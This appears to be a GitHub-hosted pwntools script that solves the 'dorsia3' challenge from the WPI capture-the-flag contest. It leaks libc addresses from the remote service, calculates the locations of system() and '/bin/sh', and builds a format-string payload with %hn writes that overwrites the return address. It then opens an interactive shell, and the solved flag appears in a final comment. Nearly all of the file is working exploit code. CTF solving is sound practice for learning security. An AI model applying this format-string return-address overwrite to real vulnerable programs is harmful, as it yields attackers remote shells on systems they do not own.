-
Notifications
You must be signed in to change notification settings - Fork 0
/
dorsia3.py
109 lines (83 loc) · 2.53 KB
/
dorsia3.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
from pwn import *
# context.log_level = "DEBUG"
LOCAL = False
DEBUG = False
context.update(arch='i386', os='linux')
e = ELF("./nanoprint")
l = ELF("./libc.so.6")
if LOCAL:
p = process(e.path)
else:
host = "dorsia3.wpictf.xyz"
port = 31339
p = remote(host, port)
if DEBUG:
context.terminal = ['tmux', 'splitw', '-h']
gdb.attach(p, "b *0x565560c7") # before second printf() "b *0x565560c7"
# ret: 0x565560d9
leak = p.recvuntil("\n", drop=True)
leak_a = int(leak[:10], 16)
leak_system = int(leak[10:], 16) + 288
if LOCAL:
leak_binsh = leak_system + 1305535
else:
# /bin/sh: 0x17e0cf
leak_binsh = leak_system + 0x140ecf
log.critical("addr of a[]: {0}".format(hex(leak_a)))
log.critical("addr of system(): {0}".format(hex(leak_system)))
log.critical("addr of str_bin_sh: {0}".format(hex(leak_binsh)))
# esp before calling second printf: 0x*a0
# a[]: 0x*bb
# return address is at: 0x*12c
# example payload: aaaaa%9$nAAAABBBBCCCCDDDD, this write 0x5 to 0x41414141
# example legitimate return address: 0xf7dffe81
# how to change this value to 0xf7e23d10?
ret_addr = leak_a + (0x12c - 0xbb)
log.critical("return addr should be at: {0}".format(hex(ret_addr)))
log.critical("bin_sh should be at: {0}".format(hex(ret_addr + 8)))
s1 = leak_system & 0xffff
s2 = (leak_system >> 16) & 0xffff
b1 = leak_binsh & 0xffff
b2 = (leak_binsh >> 16) & 0xffff
q = list()
q.append((s1, ret_addr))
q.append((s2, ret_addr + 2))
q.append((b1, ret_addr + 8))
q.append((b2, ret_addr + 10))
q.sort()
for i in range(len(q)):
if i != (len(q) - 1):
assert(q[i+1][0] - q[i][0] >= 4)
success("write {0} to {1}".format(hex(q[i][0]), hex(q[i][1])))
payload = b'a'
payload += p32(q[0][1])
payload += p32(q[1][1])
payload += p32(q[2][1])
payload += p32(q[3][1])
num = len(payload)
success("length of payload so far: {0}".format(num))
a1 = 7
a2 = 8
a3 = 9
a4 = 10
payload += b'%' + str(q[0][0] - num).encode() + b'c'
payload += b'%' + str(a1).encode() + b'$hn'
num = q[0][0]
payload += b'%' + str(q[1][0] - num).encode() + b'c'
payload += b'%' + str(a2).encode() + b'$hn'
num = q[1][0]
payload += b'%' + str(q[2][0] - num).encode() + b'c'
payload += b'%' + str(a3).encode() + b'$hn'
num = q[2][0]
payload += b'%' + str(q[3][0] - num).encode() + b'c'
payload += b'%' + str(a4).encode() + b'$hn'
success(payload)
success("length of entire payload: {0}".format(len(payload)))
assert(len(payload) < 69)
if DEBUG:
print("R U ready?")
input()
p.sendline(payload)
#p.recvline()
p.interactive()
# WPI{Th3re_is_an_idea_of_4_Pa7rick_BatemaN}